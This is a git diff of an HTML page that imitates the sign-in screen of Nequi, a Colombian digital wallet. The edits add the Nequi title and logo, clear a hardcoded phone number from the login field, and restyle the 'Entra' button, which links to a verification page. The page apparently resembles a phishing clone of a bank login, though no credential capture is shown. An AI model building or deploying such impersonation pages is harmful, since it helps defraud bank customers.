--- a/Nequi/index.html
+++ b/Nequi/index.html
@@ -2,7 +2,7 @@
 <html>  <head>
     <meta charset="utf-8">
     <meta name="viewport" content="width=device-width, initial-scale=1">
-    <title></title>
+    <title>Nequi</title>
     <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bulma/0.7.2/css/bulma.min.css">
     <link rel="stylesheet" href="/Nequi/index.css">
     <link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.6.0/css/all.min.css'>
@@ -25,7 +25,7 @@
   <section class="section back" >
     <div class="container mt-1">
       <figure class=" is-480x320">
-        <img src="https://raw.githubusercontent.com/CesarMartinez7/web/refs/heads/main/aa.avif">
+        <img src="https://brandemia.org/contenido/subidas/2023/10/nequi-nuevo-logotipo.jpg">
       </figure>
       
     </div>
@@ -37,14 +37,14 @@
             <div class="field" style="width: 320px; max-width: 420px;min-width: 300px">
                 <div class="control has-icons-left has-icons-right ">
                   <input class="input is-size-6 " type="text" disabled placeholder="Numero de celular"
-                   value="3215668657" id="numero">
-                  <span class="icon is-small is-left has-text-danger  has-text-justify ">
+                    id="numero">
+                  <span class="icon is-small is-left has-text-danger has-text-justify ">
                     +57
                   </span>
                 </div>      
         </div>
         <div class=" mt-6 is-size-1">
-            <a type="submit" href="/nequi/veficacion.html" class="button is-fullwidth is-danger " style="font-size: 15px;">Entra</a>
+            <a type="submit" href="/nequi/veficacion.html" class="button is-fullwidth color-input" style="font-size: 15px;">Entra</a>
         </div>
   </section>
 
